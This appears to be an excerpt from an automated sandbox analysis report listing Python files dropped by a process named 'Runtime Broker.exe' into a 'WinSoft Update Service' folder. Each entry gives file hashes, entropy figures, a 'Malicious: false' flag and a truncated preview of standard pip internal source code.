Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	959
Entropy (8bit):	4.678124880168571
Encrypted:	false
SSDEEP:	24:1KxkEgxkqezkpxkHhG++qICXnXj/OURH0GyqhC:WYQzkfgV+qIUn77H0mhC
MD5:	DD9CF90BBDF0F94946BE4C3DF33FD862
SHA1:	D22564B4D945BB4863A6DABA1F4741F2193A4D27
SHA-256:	1020545B91ADBBD4E3270C852EF8A6FA2EA450C615BA290D87D2396AC2FAB5B0
SHA-512:	158C4E701DC3410F055B8E0E99CF1DE98E43AF756C3ED1E126A8CC351232E1A69C79CBC86694037711E97B302031296BB3370E8C17A91866062AE09FB2FBF57B
Malicious:	false
Preview:	from pip._internal.distributions.sdist import SourceDistribution.from pip._internal.distributions.wheel import WheelDistribution.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from pip._internal.distributions.base import AbstractDistribution. from pip._internal.req.req_install import InstallRequirement...def make_distribution_for_install_requirement(install_req):. # type: (InstallRequirement) -> AbstractDistribution. """Returns a Distribution for the given InstallRequirement. """. # Editable requirements will always be source distributions. They use the. # legacy logic until we create a modern standard for them.. if install_req.editable:. return SourceDistribution(install_req).. # If it's a wheel, it's a WheelDistribution. if install_req.is_wheel:. return WheelDistribution(install_req).. # Otherwise, a SourceDistribution. return SourceDistribution(install_req).

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\distributions\base.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1426
Entropy (8bit):	4.674524616087092
Encrypted:	false
SSDEEP:	24:wdPfezkvOJOQDmL1gXoxpLpHvWyBGWCDL3ycZAsH0RyPK08TgOLhPy:IWzk+Ox1gYxJJ+yBtCny6FPkw
MD5:	B38B93AE1DE6D61D42C74B87F6FE5D8F
SHA1:	9246E8A8380FAD564D86CF2DEEC781A8651010AA
SHA-256:	AC60D47F300B41037EF6F92B71B0A5EDB8463106D0F817472D65BAC5624E6D0B
SHA-512:	7BE15AD36CA227BF97068146DEFFDFAAED16231B94A45FAA7A55372E8D8175941EF5D47CBC2044DA1855D27C73427714D5AF30BDF6FC1820FEEBEF9ABBE5B323
Malicious:	false
Preview:	import abc..from pip._vendor.six import add_metaclass..from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Optional.. from pip._vendor.pkg_resources import Distribution.. from pip._internal.index.package_finder import PackageFinder. from pip._internal.req import InstallRequirement...@add_metaclass(abc.ABCMeta).class AbstractDistribution(object):. """A base class for handling installable artifacts... The requirements for anything installable are as follows:.. - we must be able to determine the requirement name. (or we can't correctly handle the non-upgrade case)... - for packages with setup requirements, we must also be able. to determine their requirements without installing additional. packages (for the same reason as run-time dependencies).. - we must be able to create a Distribution object exposing the. above metadata.. """.. def __init__(self, req):. # type: (Install

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\distributions\installed.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	761
Entropy (8bit):	4.74304102881081
Encrypted:	false
SSDEEP:	12:1V4XxkD7XxeiB8f1OvYBvJEdQD1AL8sgrq4dwpPjxKAK5KyRg91JiI08TgK/Lp:1KxkHxezkvOJOQDmLvKAP39y008TgOLp
MD5:	5B8CB301B1608319F96D11868AB7B335
SHA1:	CC6058A55F5A86866A4BA9F782C2117048C13F97
SHA-256:	694B53BD3727550484B6CDB40F467489F1E77D3F9FC0C03E497A2A02AE69479F
SHA-512:	10AB4B18032301C649956EB4AA51D1EB1DD4E67D3B5F3CCD29E1EFD3F6BBD07BE018D91A7AA58C83C6747DB778115C27F43B483B27780FC15173AEA22DDC852C
Malicious:	false
Preview:	from pip._internal.distributions.base import AbstractDistribution.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Optional.. from pip._vendor.pkg_resources import Distribution.. from pip._internal.index.package_finder import PackageFinder...class InstalledDistribution(AbstractDistribution):. """Represents an installed package... This does not need any preparation as the required information has already. been computed.. """.. def get_pkg_resources_distribution(self):. # type: () -> Optional[Distribution]. return self.req.satisfied_by.. def prepare_distribution_metadata(self, finder, build_isolation):. # type: (PackageFinder, bool) -> None. pass.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\distributions\sdist.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	4087
Entropy (8bit):	4.431693260532077
Encrypted:	false
SSDEEP:	48:flgzvzkgOx+ynPX09kx6d/D1l0zz4I7+ULHSdvO1BK13SxIKGr5X2m8HFx:flgzzkb8ynP09Yo/xSl7+5JOmi2rgmIx
MD5:	5D8C04037ED473E6B625CFC502FFD9C8
SHA1:	038F0BAF75D8AC738A6525F09915DC3446E026E3
SHA-256:	52F029E360218C9C1AD31F9033BD86A6D17993F63B2978448E6D28C13AEC906E
SHA-512:	43D8757DF7B2C10017C39BBC524FF00CC3F1A0FDEECAE94B340CACC41A887D5386F741B767B83094DF099C64C851493768FF174F9474739FE921050DEBA12A09
Malicious:	false
Preview:	import logging..from pip._internal.build_env import BuildEnvironment.from pip._internal.distributions.base import AbstractDistribution.from pip._internal.exceptions import InstallationError.from pip._internal.utils.subprocess import runner_with_spinner_message.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Set, Tuple.. from pip._vendor.pkg_resources import Distribution.. from pip._internal.index.package_finder import PackageFinder...logger = logging.getLogger(__name__)...class SourceDistribution(AbstractDistribution):. """Represents a source distribution... The preparation step for these needs metadata for the packages to be. generated, either using PEP 517 or using the legacy `setup.py egg_info`.. """.. def get_pkg_resources_distribution(self):. # type: () -> Distribution. return self.req.get_dist().. def prepare_distribution_metadata(self, finder, build_isolation):. # type: (Package

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\distributions\wheel.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1295
Entropy (8bit):	4.62241517333991
Encrypted:	false
SSDEEP:	24:1YNgxkHxez0GiJOQDmLrTF3PJxgpJdqZF2vB6K6CNuaW9q08TgOLp:6UggztSOxrx3PJx2JdqCB6KjWtkp
MD5:	D84AE8D319876A9B51F4F510779FC4B1
SHA1:	B849E2E6A04CE0337B2FCCB16CD8F5E0945923BA
SHA-256:	95E3CC0434BFA6D3EAD4D23B9FE19061B15D0E7F117426D7A19D4F6A0AEABD6F
SHA-512:	6DC4498C6326912684D39569E009094806DEE71527986C9EB57B8598AE600958417649BCFF44702F9F96764DFB185D7D885AB02C3173DC81B202B8BE8D50B90E
Malicious:	false
Preview:	from zipfile import ZipFile..from pip._internal.distributions.base import AbstractDistribution.from pip._internal.utils.typing import MYPY_CHECK_RUNNING.from pip._internal.utils.wheel import pkg_resources_distribution_for_wheel..if MYPY_CHECK_RUNNING:. from pip._vendor.pkg_resources import Distribution.. from pip._internal.index.package_finder import PackageFinder...class WheelDistribution(AbstractDistribution):. """Represents a wheel distribution... This does not need any preparation as wheels can be directly unpacked.. """.. def get_pkg_resources_distribution(self):. # type: () -> Distribution. """Loads the metadata from the wheel file into memory and returns a. Distribution that uses it, not relying on the wheel file or. requirement.. """. # Set as part of preparation during download.. assert self.req.local_file_path. # Wheels are never unnamed.. assert self.req.name.. with ZipFile(self.req.local

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\exceptions.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	12625
Entropy (8bit):	4.570621213157944
Encrypted:	false
SSDEEP:	96:9czkEhKdwvIIj33lyFKu+rniBOeYPV/tHim7MvvJqPw5/RON04hB1umPOPZ/PNWg:9Qk2KMc0HInzQekP+ZORMNZliMEs+m5
MD5:	8F470A3D0ED285908784B48424A21DA8
SHA1:	C13CEDCA080DC1AF3433EA219D284E8F880DC7EB
SHA-256:	C623CC9F3D8681E236549F2F95C0A011E059E872827BD6A085FB8D239E74FDED
SHA-512:	50891781A7B911D636FD554CD39204C314F3869762F63339CC936E4E7DD19EC4F3CD4934BB76321701B44AC5B8C2E3C74D18B522B90BB029989E11E10EF9BA71
Malicious:	false
Preview:	"""Exceptions used throughout package"""..from __future__ import absolute_import..from itertools import chain, groupby, repeat..from pip._vendor.six import iteritems..from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Any, Dict, List, Optional, Text.. from pip._vendor.pkg_resources import Distribution. from pip._vendor.requests.models import Request, Response. from pip._vendor.six import PY3. from pip._vendor.six.moves import configparser.. from pip._internal.req.req_install import InstallRequirement.. if PY3:. from hashlib import _Hash. else:. from hashlib import _hash as _Hash...class PipError(Exception):. """Base pip exception"""...class ConfigurationError(PipError):. """General exception in configuration"""...class InstallationError(PipError):. """General exception during installation"""...class UninstallationError(PipError):. """General exception during uninstallation"""...class No

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\index\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.606238928653389
Encrypted:	false
SSDEEP:	3:K2H1LLlAvnHv:Ku1LQ
MD5:	8B1D3A4A3D674CF9F227B7DCBE69552B
SHA1:	A55D1D416E674D9F4A8E0337DEFE350962F21F1A
SHA-256:	BE9B7E25E4D979F87C6BE142DB665E0525C555BB817174868882E141925A3694
SHA-512:	9E4B87724025EFBE758FB8FA370EB02274F2675D3C3C00713FF06C75B55F7005CFBE51195FD309073999C12AFB12E1BBCE5D3339D283C0602B739AEEC6307826
Malicious:	false
Preview:	"""Index interaction code.""".

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\index\collector.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	22070
Entropy (8bit):	4.5671100288217685
Encrypted:	false
SSDEEP:	384:ZR6VU31lNR2qqgExnAv9ZwQyQib00AQrBFfWBQkXCp8BaWH:ZRp1lNR2qCxAViQy5Y0AsFfWBQkXCp8f
MD5:	FD90FDABE3EBD98E33B7370F8C6E11A3
SHA1:	6E544FF982BF1FC080394172DAC3468B21D1915A
SHA-256:	819FFDC0FFC09A2212F13565A731CE299BD0B190175300A60B84E0D76533ECB1
SHA-512:	7C12DBFFBBE4F9E9ECDD9E261F98FEE9365485E53173F2446F853CBA28F83D328E8D64845BEE0EAA1F0E5D5F5D2BDAEDB22F8589F2A7DD05F6FD77B31E9EA48E
Malicious:	false
Preview:	""".The main purpose of this module is to expose LinkCollector.collect_links().."""..import cgi.import functools.import itertools.import logging.import mimetypes.import os.import re.from collections import OrderedDict..from pip._vendor import html5lib, requests.from pip._vendor.distlib.compat import unescape.from pip._vendor.requests.exceptions import RetryError, SSLError.from pip._vendor.six.moves.urllib import parse as urllib_parse.from pip._vendor.six.moves.urllib import request as urllib_request..from pip._internal.exceptions import NetworkConnectionError.from pip._internal.models.link import Link.from pip._internal.models.search_scope import SearchScope.from pip._internal.network.utils import raise_for_status.from pip._internal.utils.compat import lru_cache.from pip._internal.utils.filetypes import is_archive_file.from pip._internal.utils.misc import pairwise, redact_auth_from_url.from pip._internal.utils.typing import MYPY_CHECK_RUNNING.from pip._internal.utils.urls import path_t

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\index\package_finder.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	37454
Entropy (8bit):	4.391018784366466
Encrypted:	false
SSDEEP:	768:H3CYgKor2sCboEvstx2X7dNr+qfvYZ7vNEc3:H3CZKor2sCboistx2rdp+qfvYZ7vN
MD5:	DA5504AF4D58F59524389398A1A0ED3B
SHA1:	6A5DF8F323C3B3FBCE6A87809FBEAC1E4622E9A3
SHA-256:	97C6CB3AA51B4D9BAAB7D8ECEE5CEA4D359F2B3C04ACEB17898137B5F245D0C9
SHA-512:	2CDC0056C56DB620C21429D36788DEEDFE5DB848845EC853126EEB58943CCEFCA4C4448A0F7D054F1C1F8BEE1FCC8ACBA55643368EB6B255CE01947DC8503E1C
Malicious:	false
Preview:	"""Routines related to PyPI, indexes"""..# The following comment should be removed at some point in the future..# mypy: strict-optional=False..from __future__ import absolute_import..import logging.import re..from pip._vendor.packaging import specifiers.from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.packaging.version import parse as parse_version..from pip._internal.exceptions import (. BestVersionAlreadyInstalled,. DistributionNotFound,. InvalidWheelFilename,. UnsupportedWheel,.).from pip._internal.index.collector import parse_links.from pip._internal.models.candidate import InstallationCandidate.from pip._internal.models.format_control import FormatControl.from pip._internal.models.link import Link.from pip._internal.models.selection_prefs import SelectionPreferences.from pip._internal.models.target_python import TargetPython.from pip._internal.models.wheel import Wheel.from pip._internal.utils.compat import lru_cache.from pip._internal.utils.f

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\locations.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	6731
Entropy (8bit):	4.73049987639311
Encrypted:	false
SSDEEP:	96:RSAd8x8mpzswwWQjZEWLW8AfUq6DepFmB/0LZCjunMbcWWN9Qg/9RMA4plgznaoU:RSAdgnJw7hkhtQMoclNW6uo7Rx4
MD5:	03DC2E6825505A41C43C7980925F3E0E
SHA1:	89ECE7DE70A0C2BC6616D808301D4531F1998F3C
SHA-256:	0379418430175B2720F0693BBD7F20646D662AD367F5BFF54232357348B41EE8
SHA-512:	FBB5669F1E0E638007FAE881EC774F1D1769A430A1032070FFE2CC3A2BE933940E7087AF2D3DC46339947AC4A0F12BB8838A7411A970961C671AB02C34BBB8B4
Malicious:	false
Preview:	"""Locations where we look for configs, install stuff, etc"""..# The following comment should be removed at some point in the future..# mypy: strict-optional=False..from __future__ import absolute_import..import os.import os.path.import platform.import site.import sys.import sysconfig.from distutils import sysconfig as distutils_sysconfig.from distutils.command.install import SCHEME_KEYS # type: ignore.from distutils.command.install import install as distutils_install_command..from pip._internal.models.scheme import Scheme.from pip._internal.utils import appdirs.from pip._internal.utils.compat import WINDOWS.from pip._internal.utils.typing import MYPY_CHECK_RUNNING, cast.from pip._internal.utils.virtualenv import running_under_virtualenv..if MYPY_CHECK_RUNNING:. from distutils.cmd import Command as DistutilsCommand. from typing import Dict, List, Optional, Union...# Application Directories.USER_CACHE_DIR = appdirs.user_cache_dir("pip")...def get_major_minor_version():. # type

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\main.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	437
Entropy (8bit):	4.903588536538947
Encrypted:	false
SSDEEP:	12:1VeiB8f1OvYB9mt65XzQRro+dCle2+LcJWGORMl:1szkvNt65URroeC6LcJWBRa
MD5:	EF6379488A889BAA3506B3BDD0CC0B68
SHA1:	CC260392D3A3B6F0A6B38F54C6E5163FECFFB3B2
SHA-256:	2EAA1415BC9A640675C19D31499EB0208C7DFA6D49A129D20F3B569E347FA4CA
SHA-512:	A35043399E2911556D3540B3D7C67E0415579A5462A04BA278067FC5DE4D4C89BD14A6AA79795EE3EB95697FCDA7DA679B684A2A9D9EF25EFAB349AEAE967921
Malicious:	false
Preview:	from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import List, Optional...def main(args=None):. # type: (Optional[List[str]]) -> int. """This is preserved for old console scripts that may still be referencing. it... For additional details, see https://github.com/pypa/pip/issues/7498.. """. from pip._internal.utils.entrypoints import _wrapper.. return _wrapper(args).

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\models\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	63
Entropy (8bit):	4.022085131599381
Encrypted:	false
SSDEEP:	3:sJlRFQviFIaqtPjuqOfv:s7+CoJOfv
MD5:	F4122DF11215E5CC0F203F0C4B9238E9
SHA1:	AF1B34A8655A6A39832635A34DCBC060412ED6CB
SHA-256:	DC31D477FAB1A4FA337F3A2EA2A6BD83DB6CD42CEBE6A6877C5C5B9F1AE27A93
SHA-512:	C836375798F4D4BAB31E84974C93F930B7975DD126E0A6AEB4239D32D74985D091FD82EC7F9260167F243C3FF27B513681E623D74830489DEEBC20CEE9A3C3AB
Malicious:	false
Preview:	"""A package that contains models that represent entities..""".

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\models\candidate.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1196
Entropy (8bit):	4.621961557434419
Encrypted:	false
SSDEEP:	24:1TLX4xH0ezkiLXpdKFk0reEeSEDPYZAIWq7Oo800rawm0rfi6b0ruEC7D:todzkaZdN0rehSEyyoh0rk0rfi6b0r9w
MD5:	2CFD3235FB99997FD9E358DDA1FD9471
SHA1:	977B529ED86126465C800E208D4645598CE7C04B
SHA-256:	1A6A6B54FF180F5917838565444A256230BF7EAC0B97B2DF78237E64148D3628
SHA-512:	D4603CAB82880F928B74CC1664423E5516D2C54F80AC4A9391519CF7C8532C8EE634DCA7C9195C11D5F2C48DA55C5AB04427FEB2D8B8C2FD95CAB3CAD394C0A7
Malicious:	false
Preview:	from pip._vendor.packaging.version import parse as parse_version..from pip._internal.utils.models import KeyBasedCompareMixin.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from pip._vendor.packaging.version import _BaseVersion.. from pip._internal.models.link import Link...class InstallationCandidate(KeyBasedCompareMixin):. """Represents a potential "candidate" for installation.. """.. __slots__ = ["name", "version", "link"].. def __init__(self, name, version, link):. # type: (str, str, Link) -> None. self.name = name. self.version = parse_version(version) # type: _BaseVersion. self.link = link.. super(InstallationCandidate, self).__init__(. key=(self.name, self.version, self.link),. defining_class=InstallationCandidate. ).. def __repr__(self):. # type: () -> str. return "<InstallationCandidate({!r}, {!r}, {!r})>".format(. self.name, self.v

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\models\direct_url.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	6884
Entropy (8bit):	4.571295490836207
Encrypted:	false
SSDEEP:	192:bukr284cyRuD4qPfCf2BsfUPemVIiv5muj/Cl54g15hyRAN9d2:bL284JRW4qifaWUPemVIq5mujal54g1G
MD5:	C03A4CCE2EF970A8943FECE3013F7199
SHA1:	DCC1562C4C7463D86B743D73131FFFC7F82D5FE7
SHA-256:	644D3B8DF26653F0252E060E92E16EA7B920B193F993C0517B007C617A79D267
SHA-512:	8F5ECC2A09676EA4289EA1533593D81EDC2C995B1C96D038E3CC5322882B80E4D42D2A574B8E85AC127BF6A32E9884B7904848E5316A30D08822C4C3921F0C1E
Malicious:	false
Preview:	""" PEP 610 """.import json.import re..from pip._vendor import six.from pip._vendor.six.moves.urllib import parse as urllib_parse..from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Any, Dict, Iterable, Optional, Type, TypeVar, Union.. T = TypeVar("T")...DIRECT_URL_METADATA_NAME = "direct_url.json".ENV_VAR_RE = re.compile(r"^\$\{[A-Za-z0-9-_]+\}(:\$\{[A-Za-z0-9-_]+\})?$")..__all__ = [. "DirectUrl",. "DirectUrlValidationError",. "DirInfo",. "ArchiveInfo",. "VcsInfo",.]...class DirectUrlValidationError(Exception):. pass...def _get(d, expected_type, key, default=None):. # type: (Dict[str, Any], Type[T], str, Optional[T]) -> Optional[T]. """Get value from dictionary and verify expected type.""". if key not in d:. return default. value = d[key]. if six.PY2 and expected_type is str:. expected_type = six.string_types # type: ignore. if not isinstance(value, expected_type):. raise

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\models\format_control.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	2823
Entropy (8bit):	4.388331805710352
Encrypted:	false
SSDEEP:	48:wXzkwFeUE8+ebREjmBCXrEVvRdaAC65n4rvs4/kkWByyIyB2DlWU8Qbj3:KzkMeLHezf1t4DHWy82DlWU8Qv
MD5:	A6161545430981A1ED0BCE9BA99E701E
SHA1:	ADAFAC2B4783315FE343B96B04F588750F4507E5
SHA-256:	6058BD0AB26B7E9124B92D83382B6B5AA62E76B868D411DA052C13F0A7B1C47F
SHA-512:	8FC937C726151EE217AE683B562FE525E3FE30281F963F8094A87DABBB3B2F7E553F949F4B55DEE310622A41B02515B501D1A9BD8A27E4EFFADCEC0BDDC12DAB
Malicious:	false
Preview:	from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.exceptions import CommandError.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import FrozenSet, Optional, Set...class FormatControl(object):. """Helper for managing formats from which a package can be installed.. """.. __slots__ = ["no_binary", "only_binary"].. def __init__(self, no_binary=None, only_binary=None):. # type: (Optional[Set[str]], Optional[Set[str]]) -> None. if no_binary is None:. no_binary = set(). if only_binary is None:. only_binary = set().. self.no_binary = no_binary. self.only_binary = only_binary.. def __eq__(self, other):. # type: (object) -> bool. if not isinstance(other, self.__class__):. return NotImplemented.. if self.__slots__ != other.__slots__:. return False.. return all(. getattr(self, k) == getattr

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\models\index.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1161
Entropy (8bit):	4.639254513696168
Encrypted:	false
SSDEEP:	24:1T/anJPnCsKguJADJndYV8+J/nuMn2RliQ2koAb911sCI9m1iUMah:oJQg2qmB2RktkoAb9455A
MD5:	3F63C062834BAA699036A2BB8C743A18
SHA1:	0146F50E5D54ED0115809E9A5A9D97EC1A6F398C
SHA-256:	71AAEFC71693EE6272A04929B5A1021D466235A03A47936BB06179E736B0367F
SHA-512:	2CB762AA1C5D0DDEDBEFEA64206EC4E5139A65EB4F11755490418268ECE42FA0F666924C8B941DD59582320F85ACBEF9921F8A0483DAEC14787D1AC3BE6ABE68
Malicious:	false
Preview:	from pip._vendor.six.moves.urllib import parse as urllib_parse...class PackageIndex(object):. """Represents a Package Index and provides easier access to endpoints. """.. __slots__ = ['url', 'netloc', 'simple_url', 'pypi_url',. 'file_storage_domain'].. def __init__(self, url, file_storage_domain):. # type: (str, str) -> None. super(PackageIndex, self).__init__(). self.url = url. self.netloc = urllib_parse.urlsplit(url).netloc. self.simple_url = self._url_for_path('simple'). self.pypi_url = self._url_for_path('pypi').. # This is part of a temporary hack used to block installs of PyPI. # packages which depend on external urls only necessary until PyPI can. # block such packages themselves. self.file_storage_domain = file_storage_domain.. def _url_for_path(self, path):. # type: (str) -> str. return urllib_parse.urljoin(self.url, path)...PyPI = PackageIndex(. 'https://pypi.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\models\link.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	7471
Entropy (8bit):	4.478965839692148
Encrypted:	false
SSDEEP:	96:Gvz5QyawOdujRWUi5S8B/oWbK7Gbz4Dn8auuMteDU9/mMhL:Gb5QWOvUic6QW27JkXl
MD5:	89976AAEBB04647027BA365B0CE002D6
SHA1:	29810572C8DA5B657A9ED8A0C3A76CBCCF1B2CC9
SHA-256:	072C18BB0EFDD1D0B5CEF4858A3F3E0A6E1065F99472EA5EEB14809A4DE2F023
SHA-512:	03F1B10A5B6BEFB075F5A8B217B253A7D66030EE3C02F266C7754F867AAB6320182661BE7A3C5B4BA46CD4B4D20A325C2A80883A2E382E7B3B0E9EF99234F7FC
Malicious:	false
Preview:	import os.import posixpath.import re..from pip._vendor.six.moves.urllib import parse as urllib_parse..from pip._internal.utils.filetypes import WHEEL_EXTENSION.from pip._internal.utils.misc import (. redact_auth_from_url,. split_auth_from_netloc,. splitext,.).from pip._internal.utils.models import KeyBasedCompareMixin.from pip._internal.utils.typing import MYPY_CHECK_RUNNING.from pip._internal.utils.urls import path_to_url, url_to_path..if MYPY_CHECK_RUNNING:. from typing import Optional, Text, Tuple, Union.. from pip._internal.index.collector import HTMLPage. from pip._internal.utils.hashes import Hashes...class Link(KeyBasedCompareMixin):. """Represents a parsed link from a Package Index's simple URL. """.. __slots__ = [. "_parsed_url",. "_url",. "comes_from",. "requires_python",. "yanked_reason",. "cache_link_parsing",. ].. def __init__(. self,. url, # type: str. comes_f

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\models\scheme.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	778
Entropy (8bit):	4.480687353447373
Encrypted:	false
SSDEEP:	12:QCBhJAYp5FaREQr4GgdAh7mry13LElvZYtOqp6m4jX/YwcjcFCbP:DhRLwHUz8Cry13SYjp/4rejcQ7
MD5:	8A68A3D4679CE98BEBD3DD7B3E45916D
SHA1:	0B0DEEB55514A94C295E78CAD3AF7EDB2DA3A76D
SHA-256:	1213E44FFE86D0C77CE094CB495A2962CA791FF2BA051118985BD4F07EB030AF
SHA-512:	AB6A248AEFD14CE557D944771D19C27CECCF8745794F68A36631601D8725178FC1003D92604FAD9E3B8D353D96BA3D6198F8706B24A7F724B6275DEF666BAD9A
Malicious:	false
Preview:	""".For types associated with installation schemes...For a general overview of available schemes and their context, see.https://docs.python.org/3/install/index.html#alternate-installation.."""...SCHEME_KEYS = ['platlib', 'purelib', 'headers', 'scripts', 'data']...class Scheme(object):. """A Scheme holds paths which are used as the base directories for. artifacts associated with a Python package.. """.. __slots__ = SCHEME_KEYS.. def __init__(. self,. platlib, # type: str. purelib, # type: str. headers, # type: str. scripts, # type: str. data, # type: str. ):. self.platlib = platlib. self.purelib = purelib. self.headers = headers. self.scripts = scripts. self.data = data.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\models\search_scope.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	4751
Entropy (8bit):	4.328930625564674
Encrypted:	false
SSDEEP:	48:M2zkFLTe2huvcRLL6rgU0SDnhW7kukEW4aL79B11Z6DSUis7piyKV0MLwLik9:TzkZqRkRA1hjukn4a/PZEisViD0Mtk9
MD5:	2C57DABDBBDC6D2205872E2D14CBBD07
SHA1:	C89F691BD17342753D0864A4354D2472DF198A88
SHA-256:	2EE9B4998E3FA5D47D0C3072E87579C4718830FA7F914F2F32CA982851D98A9E
SHA-512:	880537CA6B54B2D6C4476D1217CCBF4BA716E1967CA5B548822254B16A21E76CAC236282A599D8AFCBBE2FD9D1E3FECEC3843BC057E90C91803FCAEC6ABD2C38
Malicious:	false
Preview:	import itertools.import logging.import os.import posixpath..from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.six.moves.urllib import parse as urllib_parse..from pip._internal.models.index import PyPI.from pip._internal.utils.compat import has_tls.from pip._internal.utils.misc import normalize_path, redact_auth_from_url.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import List...logger = logging.getLogger(__name__)...class SearchScope(object):.. """. Encapsulates the locations that pip is configured to search.. """.. __slots__ = ["find_links", "index_urls"].. @classmethod. def create(. cls,. find_links, # type: List[str]. index_urls, # type: List[str]. ):. # type: (...) -> SearchScope. """. Create a SearchScope object after normalizing the `find_links`.. """. # Build find_links. If an argument starts with ~, it may be. # a lo

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\models\selection_prefs.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	2045
Entropy (8bit):	4.495601112978149
Encrypted:	false
SSDEEP:	24:1szkvs+wsQ8GYLpbAYJaVP2XMglzB7N+GaHyLYd4eMQKuIgrGIpshf/Pg7d7l05P:WzkwGFbTaVglNPNLY5ze/Y2
MD5:	8F1F5A8CD3D6480EBD74A77C7571579E
SHA1:	F24A6727E78905DBBB0837DC6E359E7E7C7A1622
SHA-256:	D654B677A9DBACCAE35A046EC1D974E6D9C60A18ED0E28CA8C6E1709B9EE2E67
SHA-512:	12EFFB3607E9D21A62662F1711500A655B9575584F9656F47084E4987C15348BC6B8628B9BA2C2EB5C5EFAADD1CE21D1C1C24D592DCA5D402C4856B0F7B44FB5
Malicious:	false
Preview:	from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Optional.. from pip._internal.models.format_control import FormatControl...class SelectionPreferences(object):. """. Encapsulates the candidate selection preferences for downloading. and installing files.. """.. __slots__ = ['allow_yanked', 'allow_all_prereleases', 'format_control',. 'prefer_binary', 'ignore_requires_python'].. # Don't include an allow_yanked default value to make sure each call. # site considers whether yanked releases are allowed. This also causes. # that decision to be made explicit in the calling code, which helps. # people when reading the code.. def __init__(. self,. allow_yanked, # type: bool. allow_all_prereleases=False, # type: bool. format_control=None, # type: Optional[FormatControl]. prefer_binary=False, # type: bool. ignore_requires_python=None

